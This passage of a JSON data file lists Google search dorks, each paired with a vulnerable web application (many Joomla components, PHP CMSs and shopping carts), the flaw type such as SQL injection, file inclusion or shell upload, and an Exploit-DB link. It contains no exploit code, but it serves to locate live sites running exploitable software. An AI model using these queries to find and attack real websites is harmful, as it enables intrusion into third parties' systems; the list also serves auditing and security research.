DieselScripts.com\"", "description": "Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability - CVE: 2008-4150: https://www.exploit-db.com/exploits/6488"}, {"dork": "intitle:Web Calendar system v 3.40 inurl:.asp", "description": "Web Calendar System 3.40 (XSS/SQL) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/7265"}, {"dork": "inurl:index.php?option=com_noticia", "description": "Joomla compnent com_noticia cross site scripting: https://www.exploit-db.com/exploits/10789"}, {"dork": "inurl:guestbook.php \"Advanced GuestBook\" \"powered by phpbb\"", "description": "Advanced GuestBook 2.4.0 (phpBB) File Inclusion Vulnerability - CVE: 2006-2152: https://www.exploit-db.com/exploits/1723"}, {"dork": "inurl:index.php?option=com_portfolio", "description": "Joomla Component com_portfolio Local File Disclosure: https://www.exploit-db.com/exploits/12325"}, {"dork": "allinurl:\"/ubbthreads/\"", "description": "UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability - CVE: 2006-2568: https://www.exploit-db.com/exploits/1814"}, {"dork": "\"powered by zomplog\"", "description": "Zomplog 3.8.2 (force_download.php) File Disclosure Vulnerability: https://www.exploit-db.com/exploits/5636"}, {"dork": "inurl:\"/cgi-bin/ourspace/\"", "description": "Ourspace 2.0.9 (uploadmedia.cgi) Remote File Upload Vulnerability - CVE: 2007-4647: https://www.exploit-db.com/exploits/4343"}, {"dork": "inurl:index.php?option=com_joomradio", "description": "Joomla Component com_joomradio SQL injection vulnerability - CVE: 2008-2633: https://www.exploit-db.com/exploits/12400"}, {"dork": "\"Powered by xeCMS\"", "description": "xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability - CVE: 2007-6508: https://www.exploit-db.com/exploits/4758"}, {"dork": "Power by PHP Classifieds", "description": "Pre PHP Classifieds SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13992"}, {"dork": "\"powered by clipshare\"", "description": "ClipShare 3.0.1 (tid) Remote SQL Injection Vulnerability - CVE: 2008-2793: https://www.exploit-db.com/exploits/5839"}, {"dork": "inurl:\"com_dailymeals\"", "description": "Joomla Component com_dailymeals LFI Vulnerability: https://www.exploit-db.com/exploits/10928"}, {"dork": "inurl:\"/k12.tr/?part=\"", "description": "Okul Otomasyon Portal 2.0 Remote SQL Injection Vulnerability - CVE: 2007-5490: https://www.exploit-db.com/exploits/4539"}, {"dork": "inurl:\"com_clan\"", "description": "Joomla Component (com_clan) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15454"}, {"dork": "\"Powered by WSN Guest\"", "description": "WSN Guest Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/11344"}, {"dork": "allinurl: com_paxxgallery \"userid\"", "description": "Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability - CVE: 2008-0801: https://www.exploit-db.com/exploits/5117"}, {"dork": "inurl:\"index2.php?option=rss\" OR \"powered By Limbo CMS\"", "description": "Limbo CMS 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability - CVE: 2006-2142: https://www.exploit-db.com/exploits/1729"}, {"dork": "\"Powered by ezContents Version 1.4.5\"", "description": "ezContents 1.4.5 (index.php link) Remote File Disclosure Vulnerability - CVE: 2007-6368: https://www.exploit-db.com/exploits/4694"}, {"dork": "powered by CMSbright \u00c2\u00a9 websens", "description": "CMSbright (id_rub_page) Remote SQL Injection Vulnerability - CVE: 2008-6991: https://www.exploit-db.com/exploits/6343"}, {"dork": "allinurl: com_quiz\"tid\"", "description": "Joomla Component Quiz 0.81 (tid) SQL Injection Vulnerability - CVE: 2008-0799: https://www.exploit-db.com/exploits/5119"}, {"dork": "inurl:\"com_biographies\"", "description": "Joomla Component com_biographies SQL injection Vulnerability: https://www.exploit-db.com/exploits/11226"}, {"dork": "inurl\"com_gurujibook\"", "description": "Joomla Component com_gurujibook SQL injection Vulnerability: https://www.exploit-db.com/exploits/11225"}, {"dork": "inurl:/system/article/alltopics.php OR inurl:/system/user/index.php", "description": "OpenPHPNuke 2.3.3 Remote File Inclusion Vulnerability - CVE: 2006-2137: https://www.exploit-db.com/exploits/1727"}, {"dork": "Realizzato con WSC CMS by Dynamicsoft", "description": "WSC CMS (Bypass) SQL Injection Vulnerability - CVE: 2010-0698: https://www.exploit-db.com/exploits/11507"}, {"dork": "\"Powered by Knowledge Base\"", "description": "Knowledge Base Mod 2.0.2 (phpBB) Remote Inclusion Vulnerability - CVE: 2006-2134: https://www.exploit-db.com/exploits/1728"}, {"dork": "allinurl:\"com_extcalendar\"", "description": "Joomla Component com_extcalendar Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14694"}, {"dork": "intitle:\"Jax Formmailer - Administration\"", "description": "Jax FormMailer 3.0.0 Remote File Inclusion Vulnerability - CVE: 2009-2378: https://www.exploit-db.com/exploits/9051"}, {"dork": "Powered by: Linkarity\u00e2", "description": "Linkarity (link.php) Remote SQL Injection Vulnerability - CVE: 2008-4353: https://www.exploit-db.com/exploits/6455"}, {"dork": "inurl:index.php?option=com_yanc", "description": "Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability - CVE: 2007-2792: https://www.exploit-db.com/exploits/3944"}, {"dork": "allinurl: \"index.php?p=gallerypic img_id\"", "description": "Koobi Pro v6.1 gallery (img_id) - CVE: 2008-6210: https://www.exploit-db.com/exploits/10751"}, {"dork": "inurl:classified.php phpbazar", "description": "phpBazar 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities - CVE: 2006-2527: https://www.exploit-db.com/exploits/1804"}, {"dork": "intext:\"Powered by Firebrand Technologies\"", "description": "CMS Firebrand Tec Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/12378"}, {"dork": "\"Designed and Developed by Debliteck Ltd\"", "description": "DB[CMS] (section.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12659"}, {"dork": "Supernews 2.6", "description": "Supernews 2.6 (index.php noticia) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8869"}, {"dork": "\"powered by ezUserManager\"", "description": "ezUserManager 1.6 Remote File Inclusion Vulnerability - CVE: 2006-2424: https://www.exploit-db.com/exploits/1795"}, {"dork": "Powered by: PreProjects", "description": "Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13996"}, {"dork": "allintitle: \"MCgallery 0.5b\"", "description": "McGallery 0.5b (download.php) Arbitrary File Download Vulnerability - CVE: 2007-1478: https://www.exploit-db.com/exploits/3494"}, {"dork": "TRUC 0.11.0 :: \u00c2\u00a9 2006 by ASDIS :", "description": "RUC 0.11.0 (download.php) Remote File Disclosure Vulnerability - CVE: 2008-0814: https://www.exploit-db.com/exploits/5129"}, {"dork": "contact_frm.php", "description": "Recipes Website 1.0 SQL Injection - OSVDB-ID: 64841: https://www.exploit-db.com/exploits/12703"}, {"dork": "Powered by Natterchat v1.12", "description": "Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2008-7049: https://www.exploit-db.com/exploits/7175"}, {"dork": "\"Instant Free File Uploader\"", "description": "Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10241"}, {"dork": "Powered by Webiz inurl:'wmt/webpages", "description": "(Webiz) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12798"}, {"dork": "\"Powered by xchangeboard\"", "description": "XchangeBoard 1.70 (boardID) Remote SQL Injection Vulnerability - CVE: 2008-3035: https://www.exploit-db.com/exploits/5991"}, {"dork": "allinurl: com_mcquiz \"tid\"", "description": "Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability - CVE: 2008-0800: https://www.exploit-db.com/exploits/5118"}, {"dork": "inurl:\"com_productbook\"", "description": "Joomla Component com_productbook SQL Injection Vulnerability - CVE: 2010-1045: https://www.exploit-db.com/exploits/11352"}, {"dork": "inurl: \"com_alphacontent\"", "description": "Joomla Component alphacontent 2.5.8 (id) SQL Injection Vulnerability - CVE: 2008-1559: https://www.exploit-db.com/exploits/5310"}, {"dork": "\"Powered by: PreProjects\"", "description": "Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13987"}, {"dork": "\"Powered by SoftbizScripts\" inurl:store_info.php", "description": "Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability - CVE: 2007-5122: https://www.exploit-db.com/exploits/4457"}, {"dork": "inurl:\"com_avosbillets\"", "description": "Joomla (com_avosbillets) SQL injection Vulnerability: https://www.exploit-db.com/exploits/11223"}, {"dork": "\"Powered By Aardvark Topsites PHP 4.2.2\"", "description": "Aardvark Topsites PHP 4.2.2 (path) Remote File Inclusion Vuln - CVE: 2006-7026: https://www.exploit-db.com/exploits/1730"}, {"dork": "inurl:\"com_projectfork\"", "description": "Joomla Component com_Projectfork 2.0.10 Local File Inclusion Vuln - CVE: 2009-2100: https://www.exploit-db.com/exploits/8946"}, {"dork": "intext:\"Powered by PHPCityPortal.com\"", "description": "PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2009-4870: https://www.exploit-db.com/exploits/9395"}, {"dork": "intitle:\"jGallery\"", "description": "jGallery 1.3 (index.php) Remote File Inclusion Vulnerability - CVE: 2007-2158: https://www.exploit-db.com/exploits/3760"}, {"dork": "\"Powered by Download 3000\"", "description": "Joomla Component d3000 1.0.0 Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5299"}, {"dork": "intitle:\"zFeeder admin panel\"", "description": "zFeeder 1.6 (admin.php) No Authentication Vulnerability - CVE: 2009-0807: https://www.exploit-db.com/exploits/8092"}, {"dork": "Powered by WebStudio", "description": "WebStudio CMS (pageid) Remote Blind SQL Injection Vuln - CVE: 2008-5336: https://www.exploit-db.com/exploits/7236"}, {"dork": "inurl:\"select_file2.php\"", "description": "Flashden Multiple File Uploader Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10236"}, {"dork": "\"powered by Gradman\"", "description": "Gradman 0.1.3 (info.php tabla) Local File Inclusion Vulnerability - CVE: 2008-0393: https://www.exploit-db.com/exploits/4936"}, {"dork": "\"Designed and Developed by Debliteck Ltd\"", "description": "DB[CMS] (article.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12666"}, {"dork": "\"Powered by mlffat\"", "description": "Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8674"}, {"dork": "inurl:\"/squirrelcart/\" -squirrelcart.com", "description": "Squirrelcart 1.x.x (cart.php) Remote File Inclusion Vulnerability - CVE: 2007-4439: https://www.exploit-db.com/exploits/4295"}, {"dork": "Engine powered by easyLink V1.1.0.", "description": "easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability - CVE: 2008-6471: https://www.exploit-db.com/exploits/6494"}, {"dork": "allintext: \"This site is powered by IndexScript\"", "description": "IndexScript 2.8 (show_cat.php cat_id) SQL Injection Vulnerability - CVE: 2007-4069: https://www.exploit-db.com/exploits/4225"}, {"dork": "\u00c2\u00a92005 Ocean12 Technologies. All rights reserved", "description": "Ocean12 Membership Manager Pro Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7245"}, {"dork": "\"powered by PassWiki\"", "description": "PassWiki 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability - CVE: 2008-6423: https://www.exploit-db.com/exploits/5704"}, {"dork": "\"software 2004-2005 by randshop\"", "description": "Randshop 1.1.1 (header.inc.php) Remote File Include Vulnerability - CVE: 2006-3375: https://www.exploit-db.com/exploits/1971"}, {"dork": "\"powered by phpEmployment\"", "description": "phpEmployment (php upload) Arbitrary File Upload Vulnerability - CVE: 2008-6920: https://www.exploit-db.com/exploits/7563"}, {"dork": "inurl:\"wp-download.php?dl_id=\"", "description": "Wordpress Plugin Download (dl_id) SQL Injection Vulnerability - CVE: 2008-1646: https://www.exploit-db.com/exploits/5326"}, {"dork": "\"\u00a9 2004 PHPKick.de Version 0.8\"", "description": "PHPKick v0.8 statistics.php SQL Injection - CVE: 2010-3029: https://www.exploit-db.com/exploits/14578"}, {"dork": "\"Powered by VS PANEL\"", "description": "VS PANEL 7.3.6 (Cat_ID) Remote SQL Injection Vulnerability - CVE: 2009-3590: https://www.exploit-db.com/exploits/8506"}, {"dork": "\"powered by phpmydirectory\" OR intext:\"2001-2006 phpMyDirectory.com\"", "description": "phpMyDirectory 10.4.4 (ROOT_PATH) Remote Inclusion Vulnerability - CVE: 2006-2521: https://www.exploit-db.com/exploits/1808"}, {"dork": "intext:\"Kalimat news system v 1.0\"", "description": "kalimat new system v 1.0 (index.php) SQL Injection: https://www.exploit-db.com/exploits/11563"}, {"dork": "Powered by: PhotoPost PHP 4.6", "description": "PhotoPost PHP SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14446"}, {"dork": "\"Powered by Maian Recipe v1.0\"", "description": "Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability - CVE: 2007-0848: https://www.exploit-db.com/exploits/3284"}, {"dork": "\"Powered by CommonSense CMS\"", "description": "CommonSense CMS Sql Injection Vulnerability: https://www.exploit-db.com/exploits/13762"}, {"dork": "\"Eyeland Studio Inc. All Rights Reserved.\" inurl:game.php", "description": "Eyeland Studio Inc. (game.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13858"}, {"dork": "\"powered by Pagetool\"", "description": "Pagetool 1.07 (news_id) Remote SQL Injection Vulnerability - CVE: 2007-3402: https://www.exploit-db.com/exploits/4107"}, {"dork": "powered by jshop", "description": "Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability - CVE: 2007-0232: https://www.exploit-db.com/exploits/3113"}, {"dork": "/modules/mx_links/", "description": "mxBB Module WebLinks 2.05 Remote Inclusion Vulnerability - CVE: 2006-6645: https://www.exploit-db.com/exploits/2939"}, {"dork": "inurl:\"?pageNum_RSnews\"&view", "description": "NUs Newssystem v1.02 (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11674"}, {"dork": "inurl:index.php?option=com_directory", "description": "Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability - CVE: 2008-0690: https://www.exploit-db.com/exploits/5047"}, {"dork": "\"Powered By DynamicPAD\"", "description": "DynamicPAD 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities - CVE: 2007-2527: https://www.exploit-db.com/exploits/3868"}, {"dork": "\"Powered by : elkagroup.com\"", "description": "elkagroup (pid ) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10836"}, {"dork": "\"com_joom12pic\"", "description": "Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability - CVE: 2007-4954: https://www.exploit-db.com/exploits/4416"}, {"dork": "\"Starting bid\" \"Powered by SoftbizScripts\"", "description": "Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln - CVE: 2007-5999: https://www.exploit-db.com/exploits/4617"}, {"dork": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license", "description": "Liberum Help Desk 0.97.3 (details.asp) SQL Injection Vulnerability - CVE: 2006-6160: https://www.exploit-db.com/exploits/2846"}, {"dork": "allinurl:\"jokes.php?catagorie=\"", "description": "Jokes Site Script (jokes.php?catagorie) SQL Injection Vulnerability - CVE: 2008-2065: https://www.exploit-db.com/exploits/5508"}, {"dork": "\"Created by weenCompany\"", "description": "weenCompany SQL Injection Vulnerability - CVE: 2009-4423: https://www.exploit-db.com/exploits/10606"}, {"dork": "intext:\"Powered by eStore v1.0.2\"", "description": "eStore v1.0.2 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10784"}, {"dork": "\"Powered by: Elite Gaming Ladders v3.2\"", "description": "Elite Gaming Ladders 3.2 (platform) SQL Injection Vulnerability - CVE: 2009-3314: https://www.exploit-db.com/exploits/9702"}, {"dork": "php-addressbook v3.1.5", "description": "php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10877"}, {"dork": "\"Powered by ParsBlogger\"", "description": "ParsBlogger (blog.asp wr) Remote SQL Injection Vulnerability - CVE: 2008-5637: https://www.exploit-db.com/exploits/7239"}, {"dork": "intitle:\"vrnews v1\"", "description": "VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability - CVE: 2007-3611: https://www.exploit-db.com/exploits/4150"}, {"dork": "inurl:\"customer_testimonials.php\"", "description": "osCommerce Addon Customer Testimonials 3.1 SQL Injection Vulnerability - CVE: 2008-0719: https://www.exploit-db.com/exploits/5075"}, {"dork": "\"Powered by Espinas IT\"", "description": "Espinas CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12100"}, {"dork": "\"Powered by iNetScripts\"", "description": "Powered by iNetScripts: Shell Upload Vulnerability: https://www.exploit-db.com/exploits/12384"}, {"dork": "Maintained with the Ocean12 Poll Manager Pro v1.00", "description": "Ocean12 Poll Manager Pro Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7246"}, {"dork": "allinurl: \"com_glossary\"", "description": "Mambo Component Glossary 2.0 (catid) SQL Injection Vulnerability - CVE: 2008-0514: https://www.exploit-db.com/exploits/5010"}, {"dork": "\"\u00a9 2009 Azimut Technologie\"", "description": "Azimut Technologie Admin Login Bypass vulnerability: https://www.exploit-db.com/exploits/12695"}, {"dork": "inurl:buyer/about_us.php?BuyerID", "description": "Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12612"}, {"dork": "Maintained with the Ocean12 Calendar Manager Gold v2.04", "description": "Ocean12 Calendar Manager Gold Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7247"}, {"dork": "pagerank-0-topliste.html OR pagerank-0-tipp.html", "description": "phpscripts Ranking Script Insecure Cookie Handling Vulnerability - CVE: 2008-6092: https://www.exploit-db.com/exploits/6649"}, {"dork": "Copyright \u00c2\u00a9 2007 BrowserCRM Ltd", "description": "BrowserCRM 5.002.00 (clients.php) Remote File Inclusion Vulnerability - CVE: 2008-2689: https://www.exploit-db.com/exploits/5757"}, {"dork": "Powered by UCenter inurl:shop.php?ac=view", "description": "UCenter Home 2.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14997"}, {"dork": "\"Sinapis by scripter.ch\"", "description": "Sinapis Forum 2.2 (sinapis.php fuss) Remote File Include Vulnerability - CVE: 2007-1131: https://www.exploit-db.com/exploits/3367"}, {"dork": "\"Powered by BosClassifieds Classified Ads System\"", "description": "BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability - CVE: 2008-1838: https://www.exploit-db.com/exploits/5444"}, {"dork": "\"Powered by RGameScript\"", "description": "RGameScript Pro (page.php id) Remote File Inclusion Vulnerability - CVE: 2007-3980: https://www.exploit-db.com/exploits/4210"}, {"dork": "inurl:\"/files/redirect.asp\"", "description": "JBS v2.0 | JBSX - Administration panel bypass and Malicious File Upload Vulnerability: https://www.exploit-db.com/exploits/10161"}, {"dork": "\"Easy-Clanpage v2.2\"", "description": "Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability - CVE: 2008-1425: https://www.exploit-db.com/exploits/5275"}, {"dork": "inurl:\"/plugins/ImageManager/manager.php\"", "description": "Wordpress Image Manager Plugins Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10325"}, {"dork": "\"com_joomlaflashfun\"", "description": "Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability - CVE: 2007-4955: https://www.exploit-db.com/exploits/4415"}, {"dork": "Powered by BKWorks ProPHP Version 0.50 Beta 1", "description": "BKWorks ProPHP 0.50b1 (Auth Bypass) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7726"}, {"dork": "Powered by Sisfo Kampus 2006", "description": "Sisfo Kampus 2006 (blanko.preview.php) Local File Disclosure Vuln - CVE: 2007-4820: https://www.exploit-db.com/exploits/4380"}, {"dork": "inurl:\"sticker/sticker.php?id=\"", "description": "2Capsule (sticker.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7631"}, {"dork": "inurl:quizinfo.php", "description": "PHP-MySQL-Quiz SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10876"}, {"dork": "\"Powered by Md-Pro\"", "description": "Md-Pro 1.0.8x (Topics topicid) Remote SQL Injection Vulnerability - CVE: 2007-3938: https://www.exploit-db.com/exploits/4199"}, {"dork": "inurl:\"index.php?option=com_simpleboard\"", "description": "Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability - CVE: 2008-1077: https://www.exploit-db.com/exploits/5195"}, {"dork": "inurl:\"tradeCategory.php?id= \"", "description": "Hampshire Trading Standards Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12768"}, {"dork": "inurl:\"com_omphotogallery\"", "description": "Joomla Omilen Photo Gallery 0.5b Local File Inclusion Vulnerability - CVE: 2009-4202: https://www.exploit-db.com/exploits/8870"}, {"dork": "inurl:\"sinagb.php\"", "description": "Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability - CVE: 2007-1130: https://www.exploit-db.com/exploits/3366"}, {"dork": "inurl:csc_article_details.php", "description": "CaupoShop Classic 1.3 (saArticle[ID]) Remote SQL Injection Vulnerability - CVE: 2008-2866: https://www.exploit-db.com/exploits/5865"}, {"dork": "inurl:index.php?page=img Powered By Mini File Host", "description": "Mini File Host 1.x Arbitrary PHP File Upload Vulnerability - CVE: 2008-6785: https://www.exploit-db.com/exploits/7509"}, {"dork": "allinurl:com_pccookbook", "description": "pc_cookbook Mambo Component 0.3 Include Vulnerability - CVE: 2006-3530: https://www.exploit-db.com/exploits/2024"}, {"dork": "\"Powered by LDU\"", "description": "LDU 8.x (polls.php) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/2871"}, {"dork": "intext:\"powered by tincan ltd\"", "description": "tincan ltd (section) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11113"}, {"dork": "\"REALTOR 747 - Version 4.11\"", "description": "Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability - CVE: 2009-0495: https://www.exploit-db.com/exploits/7743"}, {"dork": "inurl:\"view_group.php?group_id=\"", "description": "Vastal I-Tech SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12845"}, {"dork": "\"CzarNews v1.12 \" | \"CzarNews v1.13\" | \"CzarNews v1.14 \"", "description": "CzarNews 1.14 (tpath) Remote File Inclusion Vulnerability - CVE: 2006-3685: https://www.exploit-db.com/exploits/2009"}, {"dork": "inurl:\"filebase.php\" \"Powered by phpBB\"", "description": "phpBB Mod FileBase (id) Remote SQL Injection Vulnerability - CVE: 2008-1305: https://www.exploit-db.com/exploits/5236"}, {"dork": "allinurl: \"name Sections op viewarticle artid\"", "description": "PHP-Nuke Module Sections (artid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5154"}, {"dork": "\"Powered by samart-cms\"", "description": "samart-cms 2.0 (contentsid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5862"}, {"dork": "Ultimate-Fun-Book 1.02", "description": "Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability - CVE: 2007-1059: https://www.exploit-db.com/exploits/3336"}, {"dork": "allinurl: \"modules/dictionary/detail.php?id\"", "description": "XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability - CVE: 2009-4582: https://www.exploit-db.com/exploits/10807"}, {"dork": "\"Copyright (C) 2000 Phorum Development Team\"", "description": "Phorum 3.2.11 (common.php) Remote File Include Vulnerability - CVE: 2006-6550: https://www.exploit-db.com/exploits/2894"}, {"dork": "inurl:flashblog.html OR inurl:/flashblog/", "description": "FlashBlog 0.31b Remote Arbitrary File Upload Vulnerability - CVE: 2008-2574: https://www.exploit-db.com/exploits/5728"}, {"dork": "\"Powered By CMS-BRD\"", "description": "CMS-BRD (menuclick) Remote SQL Injection Vulnerability - CVE: 2008-2837: https://www.exploit-db.com/exploits/5863"}, {"dork": "\"inurl:/admin/\" \"ImageVue\"", "description": "ImageVue 2.0 Remote Admin Login: https://www.exploit-db.com/exploits/10630"}, {"dork": "\"TROforum 0.1\"", "description": "TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability - CVE: 2007-2937: https://www.exploit-db.com/exploits/3995"}, {"dork": "\"Uploader by CeleronDude.\"", "description": "Uploader by CeleronDude 5.3.0 Shell Upload: https://www.exploit-db.com/exploits/10523"}, {"dork": "\"Review Script\" \"Phil Taylor\"", "description": "Mambo Component Comments 0.5.8.5g SQL Injection Vulnerability - CVE: 2008-0773: https://www.exploit-db.com/exploits/5094"}, {"dork": "intitle:Mp3 ToolBox 1.0", "description": "Mp3 ToolBox 1.0 beta 5 (skin_file) Remote File Inclusion Vulnerability - CVE: 2007-6139: https://www.exploit-db.com/exploits/4650"}, {"dork": "Powered by: Maian Greetings v2.1", "description": "Maian Greetings 2.1 Insecure Cookie Handling Vulnerability - CVE: 2008-7086: https://www.exploit-db.com/exploits/6050"}, {"dork": "allinurl: \"com_alberghi\" detail", "description": "Joomla Component Alberghi 2.1.3 (id) SQL Injection Vulnerability - CVE: 2008-1459: https://www.exploit-db.com/exploits/5278"}, {"dork": "\"Powered By phpBB Garage 1.2.0\"", "description": "phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability - CVE: 2007-6223: https://www.exploit-db.com/exploits/4686"}, {"dork": "inurl:index.php?option=com_ynews", "description": "Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability - CVE: 2008-0653: https://www.exploit-db.com/exploits/5072"}, {"dork": "\"Powie's PSCRIPT MatchMaker 4.05\"", "description": "Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability - CVE: 2006-6039: https://www.exploit-db.com/exploits/2798"}, {"dork": "inurl:etkinlikbak.asp", "description": "Okul Web Otomasyon Sistemi 4.0.1 Remote SQL Injection Vulnerability - CVE: 2007-0305: https://www.exploit-db.com/exploits/3135"}, {"dork": "\"Copyright 2008 ImenAfzar ver :2.0.0.0\"", "description": "Namad (IMenAfzar) 2.0.0.0 Remote File Disclosure Vulnerability: https://www.exploit-db.com/exploits/8734"}, {"dork": "allinurl:com_comprofiler", "description": "Joomla Community Builder 1.0.1 Blind SQL Injection Vulnerability - CVE: 2008-2093: https://www.exploit-db.com/exploits/5491"}, {"dork": "inurl:\"com_joomlaradiov5\"", "description": "Joomla Component joomlaradio v5 Remote File Inclusion Vulnerability - CVE: 2007-4923: https://www.exploit-db.com/exploits/4401"}, {"dork": "\"powered by phpAdBoard\"", "description": "phpAdBoard (php uploads) Arbitrary File Upload Vulnerability - CVE: 2008-6921: https://www.exploit-db.com/exploits/7562"}, {"dork": "\"Powered by Quick.Cms\"", "description": "Quick.Cms.Lite 0.5 (id) Remote SQL Injection Vulnerability - CVE: 2009-1410: https://www.exploit-db.com/exploits/8505"}, {"dork": "\"Powered by wpQuiz\" inurl:index.php", "description": "wpQuiz v2.7 Authentication Bypass Vulnerability - CVE: 2010-3608: https://www.exploit-db.com/exploits/15075"}, {"dork": "\"Powered by UCStats version 1.1\"", "description": "UCStats v1.1 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10891"}, {"dork": "\"Powered by CCLeague Pro\"", "description": "CCLeague Pro 1.2 Insecure Cookie Authentication Vulnerability - CVE: 2008-5123: https://www.exploit-db.com/exploits/5888"}, {"dork": "intitle:Bilder Galerie 1.1 or intitle:Bilder Galerie", "description": "MatPo Bilder Galerie 1.1 Remote File Inclusion Vulnerability - CVE: 2007-6649: https://www.exploit-db.com/exploits/4815"}, {"dork": "\"Powered by: PostGuestbook 0.6.1\"", "description": "PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability - CVE: 2007-1372: https://www.exploit-db.com/exploits/3423"}, {"dork": "\"powered by sunshop\"", "description": "SunShop Shopping Cart 3.5 (abs_path) RFI Vulnerabilities - CVE: 2007-2070: https://www.exploit-db.com/exploits/3748"}, {"dork": "Powered by SkaDate Dating", "description": "SkaDate Online 5.0/6.0 Remote File Disclosure Vulnerability - CVE: 2007-5299: https://www.exploit-db.com/exploits/4493"}, {"dork": "inurl:\"ibase site:de\"", "description": "ibase 2.03 (download.php) Remote File Disclosure Vulnerability - CVE: 2008-6288: https://www.exploit-db.com/exploits/6126"}, {"dork": "\"Powered by sNews\"", "description": "sNews v1.7 (index.php?category) SQL Injection Vulnerability - CVE: 2010-2926: https://www.exploit-db.com/exploits/14465"}, {"dork": "\"Powered by Gravy Media\"", "description": "Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability - CVE: 2009-2184: https://www.exploit-db.com/exploits/8996"}, {"dork": "inurl:\"index.php?option=com_djiceshoutbox\"", "description": "Joomla Djice Shoutbox 1.0 Permanent XSS Vulnerability: https://www.exploit-db.com/exploits/8197"}, {"dork": "inurl:com_filiale", "description": "Joomla Component Filiale 1.0.4 (idFiliale) SQL Injection Vulnerability - CVE: 2008-1935: https://www.exploit-db.com/exploits/5488"}, {"dork": "\"Powered By AV Arcade\"", "description": "AV Arcade 2.1b (index.php id) Remote SQL Injection Vulnerability - CVE: 2007-3563: https://www.exploit-db.com/exploits/4138"}, {"dork": "Powered by NATTERCHAT v 1.1", "description": "NatterChat 1.1 (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2008-7049: https://www.exploit-db.com/exploits/7172"}, {"dork": "ogrencimezunlar.php", "description": "Okul Merkezi Portal 1.0 (ataturk.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/3012"}, {"dork": "inurl:index.php?option=com_yanc \"listid\"", "description": "Joomla Component com_yanc SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11603"}, {"dork": "Powered by 6rbScript", "description": "6rbScript (news.php newsid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5663"}, {"dork": "powered by vpasp v 6.50", "description": "VP-ASP Shopping Cart 6.50 Database Disclosure Vulnerability - CVE: 2008-5929: 